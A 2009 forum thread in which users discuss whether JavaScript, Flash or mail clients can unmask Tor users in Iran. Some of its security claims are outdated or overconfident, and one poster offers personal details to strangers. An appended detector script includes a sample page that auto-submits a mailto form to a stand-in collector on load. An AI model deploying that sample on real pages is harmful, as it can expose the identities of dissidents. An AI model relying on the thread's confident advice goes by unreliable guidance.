will javascript reveal the true identity?

Discussion in 'Keeping Your Anonymity In Iran' started by Unregistered, Jun 26, 2009.

  1. If a user in Iran disabled JavaScript and was using Tor, and the user wanted to access a website, will enabling JavaScript mean the person's real IP address is shown even if they are using Tor?
  2. Hechicera Member

  3. echo-IRAN Member

    Javascript in the blocking industry includes other active contents such as flash.

    Javascript as an extension of HTML is pretty safe, sandboxed in the browser, dealing only with data from the site. But flash is external to the browser and has some access to your computer. Your IP is hidden from TOR, but flash can find out something from your computer; IP might be one of those, depending on what the plug-in is. Flash from well-known sites is safe, or people will bark at them. Unknown sites may spy on you or attack you.
  4. Javascript, depending on whether it's Server-side or Client-side, can obtain data. Client-side is generally safe, but with stuff that gets external info it could be risky. I don't know if it's only the Tor info it can grab or what, but be careful.

    NoScript when using Tor for added protection, but Tor is supposed to kill Javascript anyway
  5. echo-IRAN Member

    If you are not trying to spread disinformation, sincerely want to help, register so people can get back at you to verify information.

    Is the guy asking the question sitting at his server? No, of course he is a client. If I say javascript is totally safe someone will be bound to say something irrelevant, so leave it at that. As you say, client-side javascript on a webpage has absolutely no privilege of gaining any information about your computer, except for some security holes that haven't been plugged yet.

    In TOR only the entry node knows your IP and nothing else. To find anything more about you, all three nodes you use have to be your enemies, have to store everything, decrypt everything, correlate and find a needle in a haystack of users.

    Any other plug-ins, like flash, java and other players, are like downloaded applications. They can find out some information from your computer and send it back to base. There's nothing related to TOR.
  6. Test this link out: see if it shows you your true ip address

    Without a proxy get your real ip address:

    What Is My IP Address? - IP Address Lookup, Internet Speed Test, IP Info, plus more

    And with a proxy try this:

    The JavaScript Source: User Details: IP Address

    Do this in either order. Make sure you do nothing to reset your IP address in between doing those things.

    As a developer, if javascript can access the info, then I can assure you that I can get it.

    So all I need to know is if you see your correct IP address when you use this and then, if you can, I can certainly create an application that can grab that info.

    Good luck.

    [MODEDIT: the poster wishes to retract this statement, anyways, do your own research people, exploits, flash, cookies w/ javascript can be used to compromise your security. Please use TOR and hopefully a portable firefox or Opera install that you only use for visiting sites you are worried about]
  7. echo-IRAN Member

    Wow, this site is infested with professional disinformers. Reid, this is not called registration.

    If you are using TOR, of course you get the IP address of a TOR node. What do you want to imply? Do you understand the first post?
  8. Hechicera Member

    Right then, copypastafu

    From my first link above, Tor's official site. As I said, for me, my Firefox doesn't leave home without NoScript, torbutton or no torbutton. I tend to uninstall Flash. Flash, as posted above is also an issue, and cookies haven't been mentioned yet. Cookies should be cleared every connection, turned off if you can handle it if you want tight security.

    Firefox->Tools->Options..->Privacy Tab, cookies & clear private data
  9. Ray Murphy Member

    I've been wondering how useful this anonymizing information would be for the average user in Iran right now, when most users would have either little access to the net or nothing significant to transmit.

    It also seems to me that if anyone did have news or images to distribute, they would become sitting ducks if they were on a government list of those who had downloaded Tor and then suddenly started transmitting a lot of data or contacting a lot of email addresses within Iran, they would be put under watch.

    I would have thought that once a person was put on a watch-list, a simple analysis program at any given ISP's location could pinpoint the common email address/IP number/person - going from past contacts between those email addresses. For example there is often only ONE person on the planet who uses any given set of email addresses.
  10. Reid Albecker Member

    OK, echo is right

    My original quick search on how to get an ip address using JavaScript produced a result, but I was misled by it. The JavaScript is actually doing nothing but grabbing something that the server put there in the first place. Other sources state that there is no way to get an IP address using javascript. If that is true, then echo is correct.

    Incidentally, the IP addresses wouldn't have matched for the test, which would indicate a FAIL for javascript getting the correct IP address. Which means that anyone doing that test would not conclude that javascript exposed their address to an application.

    But be cautious anyway.
  11. echo-IRAN Member

    Come on, security 101 is not to use anything you cannot verify to be secure. Smart ones will not need your script, and who is dumb enough to download your script and do their own security?
  12. Hechicera Member


    You do make good points that access to the main Tor download page may be probably being logged or blocked now. But, there are many mirrors. So, hopefully people can find a mirror or a friend to give them the install package. It may be helpful to mirror Tor elsewhere, get ex-pat blogs to host copies. Need them to be IPs that many others would be visiting anyway. Maybe gaming sites too. Would be nice to see.

    However, just knowing some IP went to Tor isn't sufficient. They need to pressure local IPs for their logs. For instance, my IP comes from a pool from my ISP. It isn't static. I might have a different one next week, or even tomorrow. That kind of tracking also assumes that one protester posted twice from the same place. Hopefully, they are moving about.

    Once you have Tor it will mask where you are going. So someone with Tor can go to Tor's site and it won't look like they went there. That's how it dodges censors. It just looks like a random encrypted connection to some random IP in the Tor network. Some are in big data centers, so this will look very normal.

    Also realize that not everyone that uses Tor would be a protester. This is not a new tool. If the Basij start busting in on businessmen trying to quietly get one account transferred anonymously overseas, then a whole new group will get upset.
  13. < shakes head >

    The script is embedded into a webpage, when the user views the page the script is loaded.

    If the user has lax security that script will cause the user's machine to email whatever address is within it transparently without the user's knowledge.

    The recipient of the email then only needs to backtrace the email's origin.

    BTW, it is not "my" script.
  14. echo-IRAN Member

    Nobody bothers to repost news on this site. Firstly, most users are not thinking about anonymity. They just want working proxies to read news from reliable sources. This is what they asked and are still asking. TOR is a proxy that everybody can help with their home computer, not so sure with squid.

    At their official site, Freegate say they cannot cope with the traffic and have to limit or stop the service again. On youtube, I saw a video of a girl that has installed Ultrasurf on her laptop, which stopped working. Ultimately these software offer a very similar thing to TOR. TOR published that they have at most thousands of users. Freegate users are probably in the millions. So the govt cannot target you just because you use any of these.
  15. Ray Murphy Member

    Ah, that makes more sense. I assume it would have been mentioned occasionally but I hadn't noticed.
  16. echo-IRAN Member

    Log is log, the basic being the different IPs you used. By law many countries have to store when and what website you visited, from 6 months to 2 years. Govt does not need to pressure the Iranian ISPs to give up any information, they run the ISPs or they just tell them what to do.
  17. echo-IRAN Member

    Common wisdom: you have about 2 sec in front of your CEO, if you screw that up you may not have the chance to speak again. I would say at war you have about 3 sec with everybody. Obviously, I didn't know what's your point, and I would not have read the script and find out. I just try to guess what you said that may be useful using the few words you posted.

    So what's your point? It's not javascript, it's your email client that may and may not have permission granted to send mail transparently. If your email client allows transparent emails by default, trash it immediately.

    And if you have TOR, your IP is also protected, so I couldn't make out anything that is relevant to the opening post.
  18. echo-IRAN Member

    Not wanting to bump this thread later unnecessarily.

    The point is, if you simply say javascript is bad, soon some users will turn off javascript in their browser, and demand a javascript-free site, which causes a headache for webmasters, causing removal of convenience features for other users. Right here in WWP previously.

    Javascript is just a language like English. It depends on how you use it. On a webpage javascript (client) is safe. If not, it's a browser security issue and it's a big deal, losing market share that sort of big deal.

    Firefox addons have the same privilege as any applications, including looking at your files and your IP. It's written in javascript.

    Flash, like any other plugin, is also an application with its own capabilities. Flash (or whatever it's called) is written in action script, a version of javascript.

    Practically you install Noscript that will block anything risky. It's widely used and sort of trusted. It is just a way for you to disable everything by default, and enable your plug-ins with convenience. It's blocking anything but client-side javascript. The down side is that the first few times you use noscript it may be very frustrating when you cannot view youtube without knowing how to unblock.

    The better way is of course not to visit stranger or hostile websites when you don't have to.

    If you worry about your cookies, there's the flash cookies that's worse.
  19. It is javascript. :rolleyes:

    Javascript which opens the email client and sends an email in the background.

    TOR has no effect on your email client when set to the default settings.
    Tor: Download

    My point is that nefarious sites may use this to attempt to identify protesters.
  20. echo-IRAN Member

    I can see why you don't want to register. If by default your browser and email client let you send an email transparently, trash them both. When you set up an email client it's like downloading flash player, and you know that it's an application with full access to your computer. Your browser just passes control to these external applications, with your blessing.

    Now no decent email client should send an email transparently nowadays. But it's really no big deal because the website will see the same IP as that will be in your email.

    And then how does the email client send an email? Through your network connection of course. That means via the same connection that you are surfing the website. The originating IP will be that of a TOR node. If your client actually manages to dig up your external IP via your firewall and announce it to the server, trash it too.
  21. I am the original poster. If you disable javascript and try to register for a facebook account it will not let you. It says javascript needs to be enabled. Is there any way around this?
  22. Hechicera Member

  23. echo-IRAN Member

    I know this will happen.

    Javascript from a website has no access to your comp and cannot find out your IP, if you are using a proxy. (if you are using firefox)

    If big companies like Facebook do something that compromises your privacy, people will find out immediately and revolt, it happened before on Facebook. Any fancy things FB put on their website, like flash, will not try to get your IP, or their stock will plummet.

    If users are allowed to embed some fancy things on their homepage, these may be malicious. But most of these gadgets are standard stuff, used and tested by millions.

    The No-script Firefox plug-in in your browser basically blocks all the plug-ins like flash and all sorts of players. You are pretty safe with it even if you assume FB is out to get you and your IP. Use it like the guy says in the above post.
  24. < shakes head again >

    Did you click this link ?

    The JavaScript Source: User Details: Visitor Monitor

    If you did and a popup did not show up asking to launch or cancel you have likely just succeeded in emailing "" with a topic title of "Devious Visitor Monitor".

    Now, if a "bad guy" from the Iranian government happens to put that script in a fictitious page advertising, for instance, proxies and the unsuspecting protester happens to open that page the bad guy simply needs to read the email header to find the protester.

    I simply do not know how to say it more simply... And I noticed that you did not read the image I previously posted.
  25. echo-IRAN Member

    Are you using IE and Outlook? That's dumb, everybody will tell you that. The IP in the email will be the IP of your proxy, not yours.

    Edit: actually I missed the point of default email clients not using proxy. But is that really dumb? You are sending your IP to everybody while worrying about your IP being logged by facebook?
  26. Hechicera Member

    Yes, the image you posted, which I also linked to, then copy pasted.

    Curiosity question, you see 0, 1, 2 or 3 from me just now. Tested some combos.
  27. I am the original poster of this thread. I have registered now. I have found a solution for me to register for facebook.
    The solution is, can someone here sign me up for a facebook account? If you can, please PM me and I will give you my name, email, and everything you need to create me a facebook account. Then you can PM me back once you have created it.

    So if you are willing to create me a facebook account please PM me now.

    Thank you
  28. Ok guys, don't PM me once you create me a facebook account, email me here:

    Also Post here saying "done" once you created it for me.

  29. I mean email me at saying you will create a facebook account for me. I will then email you my details that you will use to create my facebook account.
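
Posts 13, 19 and 24 describe a page whose script hands an e-mail to the local mail client, which post 25 notes may not go through the proxy. As an added example (not part of the thread, and not the linked script), here is a static check of saved page source for that pattern, assuming the trigger is a `mailto:` URL; the function names and sample pages are constructed for illustration.

```javascript
// Added example, not from the thread: static audit of saved HTML for mailto: triggers.
// Assumption: the mail client is reached through a mailto: URL; all names are hypothetical.
function findMailtoTriggers(html) {
  const findings = [];
  const add = (kind, text) => findings.push({ kind, snippet: text.trim().slice(0, 80) });

  // A form whose action is mailto: hands its fields to the mail client on submit.
  for (const m of html.matchAll(/<form\b[^>]*\baction\s*=\s*["']?\s*mailto:[^"'\s>]*/gi)) {
    add("mailto-form", m[0]);
  }
  // Ordinary links need a deliberate click; recorded so the report is complete.
  for (const m of html.matchAll(/<a\b[^>]*\bhref\s*=\s*["']?\s*mailto:[^"'\s>]*/gi)) {
    add("mailto-link", m[0]);
  }
  // Script bodies and inline event handlers are the code that can act without a click.
  const code = [
    ...[...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)].map((m) => m[1]),
    ...[...html.matchAll(/\bon[a-z]+\s*=\s*(["'])([\s\S]*?)\1/gi)].map((m) => m[2]),
  ];
  for (const c of code) {
    // Heuristic: any scripted submit() counts, since the target form is not resolved here.
    if (/\.submit\s*\(/.test(c)) add("scripted-submit", c);
    if (/location(?:\.href)?\s*=\s*["']\s*mailto:/i.test(c)) add("scripted-navigation", c);
  }
  return findings;
}

// "automatic": can fire on page load; "user-click": needs a click; "none": no mailto: use.
function classify(html) {
  const kinds = new Set(findMailtoTriggers(html).map((f) => f.kind));
  if (kinds.has("scripted-navigation")) return "automatic";
  if (kinds.has("mailto-form") && kinds.has("scripted-submit")) return "automatic";
  if (kinds.has("mailto-form") || kinds.has("mailto-link")) return "user-click";
  return "none";
}

// Constructed sample pages (example.invalid is a reserved, non-routable domain).
const SAMPLE_AUTO = `<body onload="document.forms[0].submit()">
<form action="mailto:collector@example.invalid" method="post"><input name="v"></form></body>`;
const SAMPLE_LINK = `<p><a href="mailto:admin@example.invalid">Contact</a></p>`;
const SAMPLE_CLEAN = `<script>document.title = "hello";</script><form action="/search"></form>`;

console.log(classify(SAMPLE_AUTO), classify(SAMPLE_LINK), classify(SAMPLE_CLEAN));
```

A page classified as "automatic" is one to open only in a browser profile with no mail handler registered; the check is pattern-based and will not see triggers built by obfuscated or externally loaded script.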
